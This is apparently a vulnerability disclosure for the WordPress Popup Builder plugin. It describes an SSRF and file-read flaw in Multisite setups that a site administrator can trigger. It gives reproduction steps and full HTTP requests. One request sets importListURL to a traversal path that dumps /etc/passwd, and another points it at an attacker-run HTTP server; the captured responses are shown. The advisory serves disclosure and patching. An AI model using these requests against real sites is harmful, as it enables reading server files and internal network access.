Description The plugin does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.
1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the popup-builder plugin and activate it for the network
3. Login as said new administrator to the separate site (here: "site2" at "/site2/").
4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy Subscription
5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the File-Field.
6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce.
7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd":
POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close
action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend=
This will output the first line of /etc/passwd in the response:
<div class="subFormItem__title">
root:x:0:0:root:/root:/bin/bash
</div>
8. Alternatively, "importURL" can be set to any URL allowing for SSRF, i.e. "importListURL=http://localhost:1337" with a "python -m http.server 1337" serving a "hacked.txt":
POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 130
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [Cookies]
Connection: close
action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend=
Response:
<div class="subFormItem__title">
Hacked
</div>
Output from python:
root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -